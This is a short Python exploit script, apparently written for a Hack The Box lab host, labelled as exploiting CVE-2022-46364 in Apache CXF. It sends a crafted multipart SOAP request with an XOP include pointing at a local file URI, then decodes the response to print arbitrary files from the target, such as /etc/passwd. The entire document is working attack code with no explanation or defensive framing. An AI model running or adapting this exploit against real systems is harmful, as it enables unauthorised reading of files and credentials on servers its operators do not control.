import requests
import argparse
import base64
import sys

vuln_url = 'http://devarea.htb:8080//employeeservice'

def exploit(file_path):
    # The boundary must match the one used in the Content-Type header
    boundary = "boundary"

    headers = {
        "Content-Type": f'multipart/related; type="application/xop+xml"; start="<rootpart>"; boundary="{boundary}"',
        "SOAPAction": '""',
    }

    body = (
        f"--{boundary}\r\n"
        "Content-Type: application/xop+xml; charset=UTF-8\r\n"
        "Content-Transfer-Encoding: 8bit\r\n"
        "Content-ID: <rootpart>\r\n"
        "\r\n"
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dev="http://devarea.htb/">\r\n'
        "   <soapenv:Body>\r\n"
        "      <dev:submitReport>\r\n"
        "         <arg0>\r\n"
        f'            <content><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file://{file_path}"/></content>\r\n'
        "         </arg0>\r\n"
        "      </dev:submitReport>\r\n"
        "   </soapenv:Body>\r\n"
        "</soapenv:Envelope>\r\n"
        f"--{boundary}--\r\n"
    )

    response = requests.post(vuln_url, headers=headers, data=body, timeout=10)
    base64_data = response.text.split("Content: ")[1].split('</return>')[0]
    if not base64_data:
        print("No data found in the response. Maybe the file doesn't exists or is empty or isn't readable.")
        return
    file_content = base64.b64decode(base64_data)
    sys.stdout.buffer.write(file_content)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit CVE-2022-46364 - Apache CXF SSRF")
    parser.add_argument("file_path", help="The file path to read on the target system (e.g., /etc/passwd)")
    args = parser.parse_args()

    exploit(args.file_path)
    
